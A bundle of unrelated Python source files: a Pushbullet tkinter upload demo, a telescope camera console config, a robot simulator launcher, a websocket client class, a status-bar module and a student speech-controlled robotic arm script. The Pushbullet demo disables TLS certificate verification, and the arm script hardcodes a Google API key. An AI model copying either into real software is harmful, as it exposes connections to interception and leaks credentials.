source | python
|---|---|
tk_upload_example.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Example tkinter app that uploads files and shows incoming pushes.
It is not necessary to connect to a listener and listen for pushes in order to upload,
but it makes the example more interesting.
"""
import asyncio
import logging
import os
import sys
import threading
import tkinter as tk
from functools import partial
from tkinter import filedialog
from tkinter_tools import BindableTextArea
sys.path.append("..") # Since examples are buried one level into source tree
from asyncpushbullet import AsyncPushbullet, LiveStreamListener, oauth2
__author__ = 'Robert Harder'
__email__ = "rob@iharder.net"
API_KEY = "" # YOUR API KEY
PROXY = os.environ.get("https_proxy") or os.environ.get("http_proxy")
# logging.basicConfig(level=logging.DEBUG)
class PushApp():
def __init__(self, root):
self.window = root
root.title("Async Pushbullet Upload Demo")
self.log = logging.getLogger(__name__)
# Data
self.ioloop = None # type: asyncio.AbstractEventLoop
self.pushbullet = None # type: AsyncPushbullet
self.pushbullet_listener = None # type: LiveStreamListener
self.key_var = tk.StringVar() # API key
self.pushes_var = tk.StringVar()
self.filename_var = tk.StringVar()
self.btn_upload = None # type: tk.Button
self.proxy_var = tk.StringVar()
# View / Control
self.create_widgets()
# Connections
self.create_io_loop()
self.key_var.set(API_KEY)
self.filename_var.set(__file__)
self.proxy_var.set(PROXY)
def create_widgets(self):
"""
API Key: [ ]
<Connect>
Filename: [ ]
<Browse> <Upload>
Pushes:
+----------------------------+
| |
+----------------------------+
"""
row = 0
# API Key
lbl_key = tk.Label(self.window, text="API Key:")
lbl_key.grid(row=row, column=0, sticky=tk.W)
txt_key = tk.Entry(self.window, textvariable=self.key_var)
txt_key.grid(row=row, column=1, sticky=tk.W + tk.E)
tk.Grid.grid_columnconfigure(self.window, 1, weight=1)
txt_key.bind('<Return>', lambda x: self.connect_button_clicked())
row += 1
btn_connect = tk.Button(self.window, text="Connect", command=self.connect_button_clicked)
btn_connect.grid(row=row, column=1, sticky=tk.W)
row += 1
# Proxy, if we want to show it
# lbl_proxy = tk.Label(self.window, text="Proxy")
# lbl_proxy.grid(row=row, column=0, sticky=tk.W)
# txt_proxy = tk.Entry(self.window, textvariable=self.proxy_var)
# txt_proxy.grid(row=row, column=1, sticky=tk.W + tk.E)
# row += 1
# File: [ ]
lbl_file = tk.Label(self.window, text="File:")
lbl_file.grid(row=row, column=0, sticky=tk.W)
txt_file = tk.Entry(self.window, textvariable=self.filename_var)
txt_file.grid(row=row, column=1, sticky=tk.W + tk.E)
row += 1
# <Browse> <Upload>
button_frame = tk.Frame(self.window)
button_frame.grid(row=row, column=0, columnspan=2, sticky=tk.W + tk.E)
row += 1
btn_browse = tk.Button(button_frame, text="Browse...", command=self.browse_button_clicked)
btn_browse.grid(row=0, column=0, sticky=tk.E)
self.btn_upload = tk.Button(button_frame, text="Upload and Push", command=self.upload_button_clicked,
state=tk.DISABLED)
self.btn_upload.grid(row=0, column=1, sticky=tk.W)
# Incoming pushes
# +------------+
# | |
# +------------+
lbl_data = tk.Label(self.window, text="Incoming Pushes...")
lbl_data.grid(row=row, column=0, sticky=tk.W)
row += 1
txt_data = BindableTextArea(self.window, textvariable=self.pushes_var, width=80, height=10)
txt_data.grid(row=row, column=0, columnspan=2)
def create_io_loop(self):
"""Creates a new thread to manage an asyncio event loop specifically for IO to/from Pushbullet."""
assert self.ioloop is None # This should only ever be run once
def _run(loop):
asyncio.set_event_loop(loop)
loop.run_forever()
self.ioloop = asyncio.new_event_loop()
self.ioloop.set_exception_handler(self._ioloop_exc_handler)
threading.Thread(target=partial(_run, self.ioloop), name="Thread-asyncio", daemon=True).start()
def _ioloop_exc_handler(self, loop: asyncio.BaseEventLoop, context: dict):
if "exception" in context:
self.status = context["exception"]
self.status = str(context)
# Handle this more robustly in real-world code
def connect_button_clicked(self):
self.pushes_var.set("Connecting...")
self.close()
async def _listen():
try:
self.pushbullet = AsyncPushbullet(self.key_var.get(),
verify_ssl=False,
proxy=self.proxy_var.get())
async with LiveStreamListener(self.pushbullet) as pl2:
self.pushbullet_listener = pl2
await self.connected(pl2)
async for push in pl2:
await self.push_received(push, pl2)
except Exception as ex:
print("Exception:", ex)
finally:
await self.disconnected(self.pushbullet_listener)
asyncio.run_coroutine_threadsafe(_listen(), self.ioloop)
def close(self):
if self.pushbullet is not None:
self.pushbullet.close_all_threadsafe()
self.pushbullet = None
if self.pushbullet_listener is not None:
assert self.ioloop is not None
pl = self.pushbullet_listener
asyncio.run_coroutine_threadsafe(pl.close(), self.ioloop)
self.pushbullet_listener = None
def browse_button_clicked(self):
print("browse_button_clicked")
resp = filedialog.askopenfilename(parent=self.window, title="Open a File to Push")
if resp != "":
self.filename_var.set(resp)
def upload_button_clicked(self):
self.pushes_var.set(self.pushes_var.get() + "Uploading...")
self.btn_upload["state"] = tk.DISABLED
filename = self.filename_var.get()
asyncio.run_coroutine_threadsafe(self.upload_file(filename), loop=self.ioloop)
async def upload_file(self, filename: str):
# This is the actual upload command
info = await self.pushbullet.async_upload_file(filename)
# Push a notification of the upload "as a file":
await self.pushbullet.async_push_file(info["file_name"], info["file_url"], info["file_type"],
title="File Arrived!", body="Please enjoy your file")
# Push a notification of the upload "as a link":
await self.pushbullet.async_push_link("Link to File Arrived!", info["file_url"], body="Please enjoy your file")
self.btn_upload["state"] = tk.NORMAL
self.pushes_var.set(self.pushes_var.get() + "Uploaded\n")
async def connected(self, listener: LiveStreamListener):
self.btn_upload["state"] = tk.NORMAL
self.pushes_var.set(self.pushes_var.get() + "Connected\n")
async def disconnected(self, listener: LiveStreamListener):
self.btn_upload["state"] = tk.DISABLED
self.pushes_var.set(self.pushes_var.get() + "Disconnected\n")
async def push_received(self, p: dict, listener: LiveStreamListener):
print("Push received:", p)
prev = self.pushes_var.get()
prev += "{}\n\n".format(p)
self.pushes_var.set(prev)
def main():
tk1 = tk.Tk()
program1 = PushApp(tk1)
tk1.mainloop()
if __name__ == '__main__':
API_KEY = oauth2.get_oauth2_key()
if not API_KEY:
with open("../api_key.txt") as f:
API_KEY = f.read().strip()
try:
main()
except KeyboardInterrupt:
print("Quitting")
pass
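# Note on the threading pattern above (a sketch, not part of the demo): since
# asyncio.run_coroutine_threadsafe() returns a concurrent.futures.Future, the
# tkinter thread could also block for a coroutine's result when that is acceptable:
#
#     future = asyncio.run_coroutine_threadsafe(some_coroutine(), self.ioloop)
#     result = future.result(timeout=30)  # blocks the calling (UI) thread until done
#
# Here some_coroutine() stands for any coroutine, e.g. self.upload_file(filename).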
|
console_osu4k.py
|
# azcamconsole config file for OSU4k
import os
import threading
from azcam_ds9.ds9display import Ds9Display
import azcam
import azcam.shortcuts_console
# ****************************************************************
# files and folders
# ****************************************************************
azcam.db.systemname = "OSU4k"
azcam.db.systemfolder = f"{os.path.dirname(__file__)}"
azcam.utils.add_searchfolder(azcam.db.systemfolder, 0) # top level only
azcam.utils.add_searchfolder(os.path.join(azcam.db.systemfolder, "common"), 1)
azcam.db.datafolder = os.path.join("/data", azcam.db.systemname)
parfile = f"{azcam.db.datafolder}/parameters_console_{azcam.db.systemname}.ini"
# ****************************************************************
# add folders to search path
# ****************************************************************
azcam.utils.add_searchfolder(azcam.db.systemfolder, 0)
# ****************************************************************
# start logging
# ****************************************************************
logfile = os.path.join(azcam.db.datafolder, "logs", "console.log")
azcam.db.logger.start_logging(logfile=logfile)
azcam.log(f"Configuring console for {azcam.db.systemname}")
# ****************************************************************
# display
# ****************************************************************
display = Ds9Display()
dthread = threading.Thread(target=display.initialize, args=[])
dthread.start() # thread just for speed
# ****************************************************************
# console tools
# ****************************************************************
azcam.tools.create_console_tools()
# ****************************************************************
# try to connect to azcam
# ****************************************************************
server = azcam.db.server
connected = server.connect() # default host and port
if connected:
azcam.log("Connected to azcamserver")
else:
azcam.log("Not connected to azcamserver")
# ****************************************************************
# read par file
# ****************************************************************
pardict = azcam.db.params.read_parfile(parfile)
azcam.db.params.update_pars(0, "azcamconsole")
# ****************************************************************
# clean namespace
# ****************************************************************
|
single_run.py
|
import argparse
import sys
from collections import deque
from queue import Queue
import time
from ev3sim.file_helper import find_abs
import yaml
from ev3sim.simulation.loader import runFromConfig
def single_run(preset_filename, robots, bind_addr):
preset_file = find_abs(preset_filename, allowed_areas=["local", "local/presets/", "package", "package/presets/"])
with open(preset_file, "r") as f:
config = yaml.safe_load(f)
config["robots"] = config.get("robots", []) + robots
shared_data = {
"tick": 0, # Current tick
"write_stack": deque(), # All write actions are processed through this
"data_queue": {}, # Simulation data for each bot
"active_count": {}, # Keeps track of which code connection each bot has.
"bot_locks": {}, # Threading Locks and Conditions for each bot to wait for connection actions
"bot_communications_data": {}, # Buffers and information for all bot communications
"tick_updates": {}, # Simply a dictionary where the simulation tick will push static data, so the other methods are aware of when the simulation has exited.
}
result_bucket = Queue(maxsize=1)
from threading import Thread
from ev3sim.simulation.communication import start_server_with_shared_data
def run(shared_data, result):
try:
runFromConfig(config, shared_data)
except Exception as e:
result.put(("Simulation", e))
return
result.put(True)
comm_thread = Thread(
target=start_server_with_shared_data, args=(shared_data, result_bucket, bind_addr), daemon=True
)
sim_thread = Thread(target=run, args=(shared_data, result_bucket), daemon=True)
comm_thread.start()
sim_thread.start()
try:
# Wait on the queue's internal condition with a short timeout (rather than a
# blocking get()) so the loop stays responsive to KeyboardInterrupt.
with result_bucket.not_empty:
while not result_bucket._qsize():
result_bucket.not_empty.wait(0.1)
r = result_bucket.get()
# Chuck it back on the queue so that other threads know we are quitting.
result_bucket.put(r)
if r is not True:
print(f"An error occurred in the {r[0]} thread. Raising an error now...")
time.sleep(1)
raise r[1]
except KeyboardInterrupt:
pass
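# A minimal command-line entry point (a sketch only; the real ev3sim CLI lives
# elsewhere, and the flag names below are illustrative assumptions, as is the
# format of the bind address expected by start_server_with_shared_data).
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Run a single ev3sim simulation preset.")
    parser.add_argument("preset", help="Preset YAML file to load")
    parser.add_argument("robots", nargs="*", help="Additional robot definition files")
    parser.add_argument("--bind", default=None, help="Bind address for the communication server")
    args = parser.parse_args(sys.argv[1:])
    single_run(args.preset, args.robots, args.bind)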
|
multiprocessor_example.py
|
import time
import multiprocessing
import random
def job(job_id):
print('Starting job: {}'.format(job_id))
# do job here
sleep_time = random.uniform(5, 25)
print('Sleeping job: {}, for {}'.format(job_id, sleep_time))
time.sleep(sleep_time)
print('Ending job: {}'.format(job_id))
if __name__ == '__main__':
for i in range(10):
p = multiprocessing.Process(target=job, args=(i, ))
p.start()
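# An alternative sketch using a bounded process pool; unlike the loop above it
# caps concurrency and waits for every job to finish. It is defined here for
# illustration only and is not called.
def run_with_pool(n_jobs=10, workers=4):
    with multiprocessing.Pool(processes=workers) as pool:
        pool.map(job, range(n_jobs))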
|
_app.py
|
"""
websocket - WebSocket client library for Python
Copyright (C) 2010 Hiroki Ohtani(liris)
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor,
Boston, MA 02110-1335 USA
"""
"""
WebSocketApp provides higher level APIs.
"""
import threading
import time
import traceback
import sys
import select
import six
from ._core import WebSocket, getdefaulttimeout
from ._exceptions import *
from ._logging import *
from ._abnf import ABNF
__all__ = ["WebSocketApp"]
class WebSocketApp(object):
"""
Higher-level APIs are provided.
The interface is similar to the JavaScript WebSocket object.
"""
def __init__(self, url, header=[],
on_open=None, on_message=None, on_error=None,
on_close=None, on_ping=None, on_pong=None,
on_cont_message=None,
keep_running=True, get_mask_key=None, cookie=None,
subprotocols=None,
on_data=None):
"""
url: websocket url.
header: custom header for websocket handshake.
on_open: callable object which is called when the websocket is opened.
this function has one argument. The argument is this class object.
on_message: callable object which is called when data is received.
on_message has 2 arguments.
The 1st argument is this class object.
The 2nd argument is a utf-8 string received from the server.
on_error: callable object which is called when an error occurs.
on_error has 2 arguments.
The 1st argument is this class object.
The 2nd argument is the exception object.
on_close: callable object which is called when the connection is closed.
this function has one argument. The argument is this class object.
on_cont_message: callback object which is called when a continuation
frame is received.
on_cont_message has 3 arguments.
The 1st argument is this class object.
The 2nd argument is a utf-8 string received from the server.
The 3rd argument is a continue flag. If 0, the data continues
in the next frame.
on_data: callback object which is called when a message is received.
This is called before on_message or on_cont_message,
and then on_message or on_cont_message is called.
on_data has 4 arguments.
The 1st argument is this class object.
The 2nd argument is a utf-8 string received from the server.
The 3rd argument is the data type: ABNF.OPCODE_TEXT or ABNF.OPCODE_BINARY.
The 4th argument is a continue flag. If 0, the data continues
in the next frame.
keep_running: a boolean flag indicating whether the app's main loop
should keep running, defaults to True
get_mask_key: a callable to produce new mask keys,
see the WebSocket.set_mask_key's docstring for more information
subprotocols: array of available sub protocols. default is None.
"""
self.url = url
self.header = header
self.cookie = cookie
self.on_open = on_open
self.on_message = on_message
self.on_data = on_data
self.on_error = on_error
self.on_close = on_close
self.on_ping = on_ping
self.on_pong = on_pong
self.on_cont_message = on_cont_message
self.keep_running = keep_running
self.get_mask_key = get_mask_key
self.sock = None
self.last_ping_tm = 0
self.subprotocols = subprotocols
def send(self, data, opcode=ABNF.OPCODE_TEXT):
"""
send message.
data: message to send. If you set opcode to OPCODE_TEXT,
data must be utf-8 string or unicode.
opcode: operation code of data. default is OPCODE_TEXT.
"""
if not self.sock or self.sock.send(data, opcode) == 0:
raise WebSocketConnectionClosedException("Connection is already closed.")
def close(self):
"""
close websocket connection.
"""
self.keep_running = False
if self.sock:
self.sock.close()
def _send_ping(self, interval, event):
while not event.wait(interval):
self.last_ping_tm = time.time()
if self.sock:
self.sock.ping()
def run_forever(self, sockopt=None, sslopt=None,
ping_interval=0, ping_timeout=None,
http_proxy_host=None, http_proxy_port=None,
http_no_proxy=None, http_proxy_auth=None,
skip_utf8_validation=False,
host=None, origin=None):
"""
run event loop for WebSocket framework.
This loop is an infinite loop and stays alive while the websocket is available.
sockopt: values for socket.setsockopt.
sockopt must be a tuple
and each element is an argument of sock.setsockopt.
sslopt: ssl socket optional dict.
ping_interval: automatically send a "ping" command
every specified period (in seconds).
If set to 0, no ping is sent automatically.
ping_timeout: timeout (in seconds) if the pong message is not received.
http_proxy_host: http proxy host name.
http_proxy_port: http proxy port. If not set, port 80 is used.
http_no_proxy: host names which should not use the proxy.
skip_utf8_validation: skip utf8 validation.
host: update host header.
origin: update origin header.
"""
if not ping_timeout or ping_timeout <= 0:
ping_timeout = None
if sockopt is None:
sockopt = []
if sslopt is None:
sslopt = {}
if self.sock:
raise WebSocketException("socket is already opened")
thread = None
close_frame = None
try:
self.sock = WebSocket(self.get_mask_key,
sockopt=sockopt, sslopt=sslopt,
fire_cont_frame=self.on_cont_message and True or False,
skip_utf8_validation=skip_utf8_validation)
self.sock.settimeout(getdefaulttimeout())
self.sock.connect(self.url, header=self.header, cookie=self.cookie,
http_proxy_host=http_proxy_host,
http_proxy_port=http_proxy_port,
http_no_proxy=http_no_proxy, http_proxy_auth=http_proxy_auth,
subprotocols=self.subprotocols,
host=host, origin=origin)
self._callback(self.on_open)
if ping_interval:
event = threading.Event()
thread = threading.Thread(target=self._send_ping, args=(ping_interval, event))
thread.daemon = True
thread.start()
while self.sock.connected:
r, w, e = select.select((self.sock.sock, ), (), (), ping_timeout)
if not self.keep_running:
break
if ping_timeout and self.last_ping_tm and time.time() - self.last_ping_tm > ping_timeout:
self.last_ping_tm = 0
raise WebSocketTimeoutException("ping timed out")
if r:
op_code, frame = self.sock.recv_data_frame(True)
if op_code == ABNF.OPCODE_CLOSE:
close_frame = frame
break
elif op_code == ABNF.OPCODE_PING:
self._callback(self.on_ping, frame.data)
elif op_code == ABNF.OPCODE_PONG:
self._callback(self.on_pong, frame.data)
elif op_code == ABNF.OPCODE_CONT and self.on_cont_message:
self._callback(self.on_data, frame.data, frame.opcode, frame.fin)
self._callback(self.on_cont_message, frame.data, frame.fin)
else:
data = frame.data
if six.PY3 and frame.opcode == ABNF.OPCODE_TEXT:
data = data.decode("utf-8")
self._callback(self.on_data, data, frame.opcode, True)
self._callback(self.on_message, data)
except Exception as e:
self._callback(self.on_error, e)
finally:
if thread:
event.set()
thread.join()
self.keep_running = False
self.sock.close()
self._callback(self.on_close,
*self._get_close_args(close_frame.data if close_frame else None))
self.sock = None
def _get_close_args(self, data):
""" this functions extracts the code, reason from the close body
if they exists, and if the self.on_close except three arguments """
import inspect
# if the on_close callback is "old", just return empty list
if sys.version_info < (3, 0):
if not self.on_close or len(inspect.getargspec(self.on_close).args) != 3:
return []
else:
if not self.on_close or len(inspect.getfullargspec(self.on_close).args) != 3:
return []
if data and len(data) >= 2:
code = 256*six.byte2int(data[0:1]) + six.byte2int(data[1:2])
reason = data[2:].decode('utf-8')
return [code, reason]
return [None, None]
def _callback(self, callback, *args):
if callback:
try:
callback(self, *args)
except Exception as e:
error("error from callback {}: {}".format(callback, e))
if isEnabledForDebug():
_, _, tb = sys.exc_info()
traceback.print_tb(tb)
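# Example usage (a minimal sketch, not part of the library; the echo server URL
# is only illustrative):
#
#     def on_message(ws, message):
#         print(message)
#
#     def on_error(ws, error):
#         print(error)
#
#     app = WebSocketApp("ws://echo.websocket.org/",
#                        on_message=on_message, on_error=on_error)
#     app.run_forever(ping_interval=30, ping_timeout=10)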
|
scratchpad.py
|
# -*- coding: utf-8 -*-
from threading import Thread
from i3pystatus import Module
import i3ipc
class Scratchpad(Module):
"""
Display the number of windows on the scratchpad and indicate urgency hints (async).
Forked from scratchpad_async of py3status by cornerman.
Requires the PyPI package `i3ipc`.
.. rubric:: Available formatters
* `{number}` — number of windows on the scratchpad
@author jok
@license BSD
"""
settings = (
("format", "format string."),
("always_show", "whether the indicator should be shown if there are"
" no scratchpad windows"),
("color_urgent", "color of urgent"),
("color", "text color"),
)
format = u"{number} ⌫"
always_show = True
color_urgent = "#900000"
color = "#FFFFFF"
def init(self):
self.count = 0
self.urgent = False
t = Thread(target=self._listen)
t.daemon = True
t.start()
def update_scratchpad_counter(self, conn, *args):
cons = conn.get_tree().scratchpad().leaves()
self.urgent = any(con for con in cons if con.urgent)
self.count = len(cons)
# output
if self.urgent:
color = self.color_urgent
else:
color = self.color
if self.always_show or self.count > 0:
full_text = self.format.format(number=self.count)
else:
full_text = ''
self.output = {
"full_text": full_text,
"color": color,
}
def _listen(self):
conn = i3ipc.Connection()
self.update_scratchpad_counter(conn)
conn.on('window::move', self.update_scratchpad_counter)
conn.on('window::urgent', self.update_scratchpad_counter)
conn.on('window::new', self.update_scratchpad_counter)
conn.on('window::close', self.update_scratchpad_counter)
conn.main()
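# Example i3pystatus configuration (a sketch; the registration name "scratchpad"
# and the settings shown are assumptions based on the module above):
#
#     from i3pystatus import Status
#     status = Status()
#     status.register("scratchpad", format=u"{number} \u232b", always_show=False)
#     status.run()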
|
vcra.py
|
#Project: Voice Controlled Robotic Arm
#Name: Abhishek Barla
#ID: 900559822
#Class: ECE 4242 - Senior Design II
#Professor: Dr. Barry Grossman
#GSA: Julius Chatterjee
#Semester: Spring 2015
#School: Florida Institute of Technology, Melbourne, FL, USA
#importing speech recognition libraries
import io, os, subprocess, wave
import math, audioop, collections
import json
#importing USB Control libraries
import usb.core
import usb.util
import sys
import time
# locate the device
dev = usb.core.find(idVendor=0x1267, idProduct=0x0000)
# assigns the device to the handle "dev"
# you can check that the device is visible to Linux with the command-line tool lsusb,
# which should report a device with the above vendor and product id codes.
# was it found?
if dev is None:
#raise ValueError('Device not found') # if device not found report an error
print "Device not found"
sys.exit(1)
# set the active configuration
dev.set_configuration()
try: # try to use python2 module
from urllib2 import Request, urlopen, URLError
except ImportError: # otherwise, use python3 module
from urllib.request import Request, urlopen
from urllib.error import URLError
#wip: filter out clicks and other too short parts
class AudioSource(object):
def __init__(self):
raise NotImplementedError("this is an abstract class")
def __enter__(self):
raise NotImplementedError("this is an abstract class")
def __exit__(self, exc_type, exc_value, traceback):
raise NotImplementedError("this is an abstract class")
try:
import pyaudio
class Microphone(AudioSource):
"""
This is available if PyAudio is available, and is undefined otherwise.
Creates a new ``Microphone`` instance, which represents a physical microphone on the computer. Subclass of ``AudioSource``.
If ``device_index`` is unspecified or ``None``, the default microphone is used as the audio source. Otherwise, ``device_index`` should be the index of the device to use for audio input.
"""
def __init__(self, device_index = None):
assert device_index is None or isinstance(device_index, int), "Device index must be None or an integer"
self.device_index = device_index
self.format = pyaudio.paInt16 # 16-bit int sampling
self.SAMPLE_WIDTH = pyaudio.get_sample_size(self.format)
self.RATE = 16000 # sampling rate in Hertz
self.CHANNELS = 1 # mono audio
self.CHUNK = 1024 # number of frames stored in each buffer
self.audio = None
self.stream = None
def __enter__(self):
self.audio = pyaudio.PyAudio()
self.stream = self.audio.open(
input_device_index = self.device_index,
format = self.format, rate = self.RATE, channels = self.CHANNELS, frames_per_buffer = self.CHUNK,
input = True, # stream is an input stream
)
return self
def __exit__(self, exc_type, exc_value, traceback):
self.stream.stop_stream()
self.stream.close()
self.stream = None
self.audio.terminate()
except ImportError:
pass
class WavFile(AudioSource):
"""
Creates a new ``WavFile`` instance, which represents a WAV audio file. Subclass of ``AudioSource``.
If ``filename_or_fileobject`` is a string, then it is interpreted as a path to a WAV audio file on the filesystem. Otherwise, ``filename_or_fileobject`` should be a file-like object such as ``io.BytesIO`` or similar. In either case, the specified file is used as the audio source.
"""
def __init__(self, filename_or_fileobject):
if isinstance(filename_or_fileobject, str):
self.filename = filename_or_fileobject
else:
assert filename_or_fileobject.read, "Given WAV file must be a filename string or a file object"
self.filename = None
self.wav_file = filename_or_fileobject
self.stream = None
def __enter__(self):
if self.filename: self.wav_file = open(self.filename, "rb")
self.wav_reader = wave.open(self.wav_file, "rb")
self.SAMPLE_WIDTH = self.wav_reader.getsampwidth()
self.RATE = self.wav_reader.getframerate()
self.CHANNELS = self.wav_reader.getnchannels()
assert self.CHANNELS == 1 # audio must be mono
self.CHUNK = 4096
self.stream = WavFile.WavStream(self.wav_reader)
return self
def __exit__(self, exc_type, exc_value, traceback):
if self.filename: self.wav_file.close()
self.stream = None
class WavStream(object):
def __init__(self, wav_reader):
self.wav_reader = wav_reader
def read(self, size = -1):
if size == -1:
return self.wav_reader.readframes(self.wav_reader.getnframes())
return self.wav_reader.readframes(size)
class AudioData(object):
def __init__(self, rate, data):
self.rate = rate
self.data = data
class Recognizer(AudioSource):
def __init__(self, language = "en-US", key = "AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw"):
"""
Creates a new ``Recognizer`` instance, which represents a collection of speech recognition functionality.
The language is determined by ``language``, a standard language code like `"en-US"` or `"en-GB"`, and defaults to US English. A list of supported language codes can be found `here <http://stackoverflow.com/questions/14257598/>`__. Basically, language codes can be just the language (``en``), or a language with a dialect (``en-US``).
The Google Speech Recognition API key is specified by ``key``. If not specified, it uses a generic key that works out of the box.
"""
assert isinstance(language, str), "Language code must be a string"
assert isinstance(key, str), "Key must be a string"
self.key = key
self.language = language
self.energy_threshold = 100 # minimum audio energy to consider for recording
self.pause_threshold = 0.8 # seconds of quiet time before a phrase is considered complete
self.quiet_duration = 0.5 # amount of quiet time to keep on both sides of the recording
def samples_to_flac(self, source, frame_data):
assert isinstance(source, AudioSource), "Source must be an audio source"
import platform, os, stat
with io.BytesIO() as wav_file:
wav_writer = wave.open(wav_file, "wb")
wav_writer.setsampwidth(source.SAMPLE_WIDTH)
wav_writer.setnchannels(source.CHANNELS)
wav_writer.setframerate(source.RATE)
wav_writer.writeframes(frame_data)
wav_writer.close()
wav_data = wav_file.getvalue()
# determine which converter executable to use
system = platform.system()
path = os.path.dirname(os.path.abspath(__file__)) # directory of the current module file, where all the FLAC bundled binaries are stored
flac_converter = shutil_which("flac") # check for installed version first
if flac_converter is None: # flac utility is not installed
if system == "Windows" and platform.machine() in ["i386", "x86", "x86_64", "AMD64"]: # Windows NT, use the bundled FLAC conversion utility
flac_converter = os.path.join(path, "flac-win32.exe")
elif system == "Linux" and platform.machine() in ["i386", "x86", "x86_64", "AMD64"]:
flac_converter = os.path.join(path, "flac-linux-i386")
else:
raise ChildProcessError("FLAC conversion utility not available - consider installing the FLAC command line application using brew install flac")
# mark converter as executable
try:
stat_info = os.stat(flac_converter)
os.chmod(flac_converter, stat_info.st_mode | stat.S_IEXEC)
except OSError: pass
process = subprocess.Popen("\"%s\" --stdout --totally-silent --best -" % flac_converter, stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
flac_data, stderr = process.communicate(wav_data)
return flac_data
def record(self, source, duration = None):
"""
Records up to ``duration`` seconds of audio from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance, which it returns.
If ``duration`` is not specified, then it will record until there is no more audio input.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
frames = io.BytesIO()
seconds_per_buffer = (source.CHUNK + 0.0) / source.RATE
elapsed_time = 0
while True: # loop for the total number of chunks needed
elapsed_time += seconds_per_buffer
if duration and elapsed_time > duration: break
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break
frames.write(buffer)
frame_data = frames.getvalue()
frames.close()
return AudioData(source.RATE, self.samples_to_flac(source, frame_data))
def listen(self, source, timeout = None):
"""
Records a single phrase from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance, which it returns.
This is done by waiting until the audio has an energy above ``recognizer_instance.energy_threshold`` (the user has started speaking), and then recording until it encounters ``recognizer_instance.pause_threshold`` seconds of silence or there is no more audio input. The ending silence is not included.
The ``timeout`` parameter is the maximum number of seconds that it will wait for a phrase to start before giving up and throwing a ``TimeoutException`` exception. If ``None``, it will wait indefinitely.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
# record audio data as raw samples
frames = collections.deque()
assert self.pause_threshold >= self.quiet_duration >= 0
seconds_per_buffer = (source.CHUNK + 0.0) / source.RATE
pause_buffer_count = int(math.ceil(self.pause_threshold / seconds_per_buffer)) # number of buffers of quiet audio before the phrase is complete
quiet_buffer_count = int(math.ceil(self.quiet_duration / seconds_per_buffer)) # maximum number of buffers of quiet audio to retain before and after
elapsed_time = 0
# store audio input until the phrase starts
while True:
elapsed_time += seconds_per_buffer
if timeout and elapsed_time > timeout: # handle timeout if specified
raise TimeoutError("listening timed out")
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
# check if the audio input has stopped being quiet
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold:
break
if len(frames) > quiet_buffer_count: # ensure we only keep the needed amount of quiet buffers
frames.popleft()
# read audio input until the phrase ends
pause_count = 0
while True:
buffer = source.stream.read(source.CHUNK)
if len(buffer) == 0: break # reached end of the stream
frames.append(buffer)
# check if the audio input has gone quiet for longer than the pause threshold
energy = audioop.rms(buffer, source.SAMPLE_WIDTH) # energy of the audio signal
if energy > self.energy_threshold:
pause_count = 0
else:
pause_count += 1
if pause_count > pause_buffer_count: # end of the phrase
break
# obtain frame data
for i in range(quiet_buffer_count, pause_count): frames.pop() # remove extra quiet frames at the end
frame_data = b"".join(list(frames))
return AudioData(source.RATE, self.samples_to_flac(source, frame_data))
def recognize(self, audio_data, show_all = False):
"""
Performs speech recognition, using the Google Speech Recognition API, on ``audio_data`` (an ``AudioData`` instance).
Returns the most likely transcription if ``show_all`` is ``False``, otherwise it returns a ``dict`` of all possible transcriptions and their confidence levels.
Note: confidence is set to 0 if it isn't given by Google
Also raises a ``LookupError`` exception if the speech is unintelligible, a ``KeyError`` if the key isn't valid or the quota for the key has been maxed out, and ``IndexError`` if there is no internet connection.
"""
assert isinstance(audio_data, AudioData), "Data must be audio data"
url = "http://www.google.com/speech-api/v2/recognize?client=chromium&lang=%s&key=%s" % (self.language, self.key)
self.request = Request(url, data = audio_data.data, headers = {"Content-Type": "audio/x-flac; rate=%s" % audio_data.rate})
# check for invalid key response from the server
try:
response = urlopen(self.request)
except URLError:
raise IndexError("No internet connection available to transfer audio data")
except:
raise KeyError("Server wouldn't respond (invalid key or quota has been maxed out)")
response_text = response.read().decode("utf-8")
# ignore any blank blocks
actual_result = []
for line in response_text.split("\n"):
if not line: continue
result = json.loads(line)["result"]
if len(result) != 0:
actual_result = result[0]
# make sure we have a list of transcriptions
if "alternative" not in actual_result:
raise LookupError("Speech is unintelligible")
# return the best guess unless told to do otherwise
if not show_all:
for prediction in actual_result["alternative"]:
if "confidence" in prediction:
return prediction["transcript"]
raise LookupError("Speech is unintelligible")
spoken_text = []
# check to see if Google thinks it's 100% correct
default_confidence = 0
if len(actual_result["alternative"])==1: default_confidence = 1
# return all the possibilities
for prediction in actual_result["alternative"]:
if "confidence" in prediction:
spoken_text.append({"text":prediction["transcript"],"confidence":prediction["confidence"]})
else:
spoken_text.append({"text":prediction["transcript"],"confidence":default_confidence})
return spoken_text
def listen_in_background(self, source, callback):
"""
Spawns a thread to repeatedly record phrases from ``source`` (an ``AudioSource`` instance) into an ``AudioData`` instance and call ``callback`` with that ``AudioData`` instance as soon as each phrase is detected.
Returns the thread (a ``threading.Thread`` instance) immediately, while the background thread continues to run in parallel.
Phrase recognition uses the exact same mechanism as ``recognizer_instance.listen(source)``.
The ``callback`` parameter is a function that should accept two parameters - the ``recognizer_instance``, and an ``AudioData`` instance representing the captured audio. Note that this function will be called from a non-main thread.
"""
assert isinstance(source, AudioSource), "Source must be an audio source"
import threading
def threaded_listen():
while True:
with source as s: audio = self.listen(s)
callback(self, audio)
listener_thread = threading.Thread(target=threaded_listen)
listener_thread.start()
return listener_thread
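# Example background use (a sketch; error handling and a stop mechanism are
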